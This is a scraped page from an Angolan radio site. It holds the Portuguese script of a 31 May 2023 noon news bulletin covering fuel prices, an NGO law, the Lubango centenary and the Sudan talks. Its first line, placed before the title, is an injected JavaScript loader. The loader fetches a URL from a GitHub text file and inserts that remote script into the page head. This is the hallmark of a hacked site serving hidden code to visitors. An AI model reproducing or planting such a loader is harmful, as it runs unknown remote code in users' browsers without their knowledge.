;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 31 Maio de 2023 | RadioPlayDigital
Jornal 12h, edição de 31 Maio de 2023

BUREAU POLÍTICO DO MPLA ANALISA CONTORNOS DO AUMENTO EM BREVE DO PREÇO OS COMBUSTIVEIS EM ANGOLA.

ORGANIZAÇOES NÃO GOVERNAMENTAIS VOLTAM A DENUNCIAR ALEGADAS MANOBRAS DO EXECUTIVO PARA LIMITAR E CONDICIONAR A SUA ACTIVIDADE.

ADMINISTRADOR DO LUBANGO APONTA VENDA AMBULANTE DESORDENADA COM UM DOS MAIORES DESAFIOS DA CIDADE DO CRISTO REI.

SUSPENSO CESSAR FOGO E NEGOCIAÇÕES NO SUDAO ENTRE GOVERNO E PARAMILITARES.

JINGLE MIX

Jornal ao meio-dia de 31 de maio de 2023. Coordenação de Alves Fernandes, com a técnica de Edson Machado e Edmundo Simões.

JINGLE MVIEIRA

O bureau político do MPLA está a analisar os contornos do aumento do preço dos combustíveis em Angola.

O objetivo do encontro passa por analisar o impacto do aumento do preço dos combustíveis na vida socio económica.

No encontro no Futungo 2, a equipa económica do executivo deve explicar os meandros desta subida. O analista Carlos Rosado de carvalho diz notar sinais de divisão no topo da equipa económico do governo sobre este assunto.

ROSADO 1

Esta eventual mexida nom processo do gasóleo e gasolina resulta numa diminuição gradual do preço destes dois produtos, uma medida já anunciada, devido ao facto de ser extremamente oneroso ao estado arcar com o subsídio aos combustíveis.

ROSADO 2

O analista MFM falou ainda sobre as especulações que correm sobre o preço em que estarão taxados o gasóleo e a gasolina

ROSADO 3

MPLA discute com a sua equipa económica a questão do aumento do preço dos combustíveis. Segundo uma fonte partidária o assunto vai amanhã ser apresentado ao conselho de ministros da sua discussão e consequente entrada em vigor.

Organizações não-governamentais (ONG) angolanas e internacionais consideraram hoje, em Luanda, a proposta de lei sobre a sua atividade “um artifício” para “limitar, condicionar, restringir e manipular” o exercício do direito à associação.

Em causa está a proposta de Lei do Estatuto das Organizações Não-Governamentais, aprovada na generalidade, no dia 25, pela Assembleia Nacional, que visa, segundo o Governo, ajustar e atualizar o regulamento sobre as ONG. Mais dados com a Maria Umba

UMBA ONGS 12H

A Ordem dos Advogados de Angola anunciou, neste sábado em comunicado, que vai avançar com “o competente procedimento legal” para afastar do cargo o juiz-conselheiro presidente do Tribunal Supremo e do Conselho Superior da Magistratura Judicial (CSMJ), Joel Leonardo, suspeito de práticas de nepotismo, corrupção e peculato.

A decisão é parte da deliberação tomada durante a Assembleia Geral Extraordinária da Ordem dos Advogados de Angola, realizada neste sábado, na província do Huambo, que se debruçou sobre o ‘Actual estado da justiça e o papel da advocacia’.

JINGLE UNITA

O Grupo Parlamentar da UNITA saudou e encorajou a iniciativa da Ordem dos Advogados de Angola. A tomada de posição da UNITA resulta daquilo que aponta como violação da lei das associações.  Américo Chivukuvuku, deu voz ao comunicado.

AMÉRICO CHIVUKUVUKO – J012H31052023

JINGLE MPLA

A situação social dos antigos combatentes e veteranos da pátria do Distrito Urbano dos Ramiros preocupa deputados do MPLA.

O presidente do Grupo Parlamentar, Virgílio de Fontes Pereira prometeu fazer todo o tipo de advocacia para melhorar as condições de vida da população. Reportagem de Cacosso Domingos.

CASSOSO DOMINGOS PARLAMENTARES

A Vice-Presidente da República, Esperança da Costa apontou a cooperação na educação e tecnologia como prioridades da CPLP.

Na abertura da XII Reunião dos Ministros da Educação da Comunidade dos Países de Língua Portuguesa (CPLP), que decorre em Luanda, Esperança Costa aponta questões como fomento as tecnologias com um dado adquiro nos tempos actuais.

ESPERANÇA COSTA 12H

A reunião é realizada pelo Ministério da Educação de Angola, no quadro da presidência em exercício da CPLP.

Segundo uma nota do site da CPLP, o encontro, que conta com a participação do secretário executivo da organização, Zacarias da Costa, vai proceder à avaliação intercalar do Plano de Acção de Cooperação Multilateral em Educação na CPLP (2022-2024), efectuar o lançamento oficial da iniciativa “Escolas Amigas da CPLP”, debater a promoção da cooperação entre a CPLP e outras organizações internacionais e reflectir em torno da cooperação educacional internacional, em tempos de emergência.

A XII Reunião de Ministros da Educação foi precedida pela reunião técnica de Pontos Focais da Educação e pelo Fórum Internacional de Cooperação em Educação na CPLP, que teve como lema “Cooperação multilateral, caminho seguro para uma educação transformacional na CPLP”.

PONTO

Assinala-se hoje 31 de Maio, o centenário da cidade do Lubango, capital da província da Huíla.

O Administrador do Lubango, mostrou-se preocupado, com a situação da venda ambulante na cidade que tira e estética da mesma, apesar do investimento em mercados, os cidadãos teimam em vender em locais impróprios.

LIZENDER ANDRÉ – 1 – J012H31052023

Lizander André, disse ainda que já se deu início a segunda fase da infraestrutura no município do Lubango, que acolhe mais de Um Milhão e Quinhentos Habitantes.

LIZENDER ANDRÉ – 2 – J012H31052023

Cidade do Lubango, capital da província da Huila, completa hoje Cem Anos.

Lubango foi elevada a categoria de cidade em 31 de maio de 1923, quando o Caminho de Ferro de Moçâmedes, depois de vencer o deserto do Namibe e a serra da Chela, atingiu finalmente o planalto, inaugurando-se a estação ferroviária.

Os caminhos de ferro permitiram uma ligação mais rápida e segura com Moçâmedes, marcando um período de grande prosperidade económica.

INTERNACIONAL

Exército do Sudão suspende participação nas negociações com os paramilitares.

Exército alega que os rebeldes não estão a aplicar acordo previsto nas tréguas temporárias

Mais de 670 mortos, um mês de conflito. Os combates prosseguem no Sudão

O Exército sudanês suspendeu a participação nas negociações na Arábia Saudita que visavam eventuais tréguas com os paramilitares que disputam o poder no Sudão, disse à France Presse fonte governamental sudanesa.

A fonte do Governo do Sudão, que não quis ser identificado, disse que o Exército de Cartum tomou a decisão de suspender as negociações “porque os rebeldes nunca aplicaram os pontos do acordo sobre tréguas temporárias, que preveem a retirada dos hospitais e das casas”.

Os confrontos no Sudão eclodiram em Cartum no dia 15 de abril entre o Exército e os paramilitares das Forças de Reação Rápida tendo-se alastrado a vários pontos do país.

Devido ao conflito, que agravou as condições de extrema pobreza do Sudão, as Nações Unidas alertam que é necessária ajuda humanitária de emergência para acudir de imediato aos deslocados internos e às populações civis que se refugiaram em países vizinhos.

secretário-geral das Nações Unidas (ONU), António Guterres, alertou hoje a Coreia do Norte que qualquer lançamento usando tecnologia de mísseis balísticos violaria as resoluções do Conselho de Segurança da Organização.

“O secretário-geral exorta a República Popular Democrática da Coreia a retomar os esforços diplomáticos em direção à paz sustentável e à desnuclearização completa e verificável na Península Coreana”, disse o porta-voz de Guterres, Stéphane Dujarric, em comunicado.

FIM.FIM

 

Data de Emissão: 31-05-2023 às 12:00
Género(s): Noticiário
 
PARTICIPANTES

Relacionados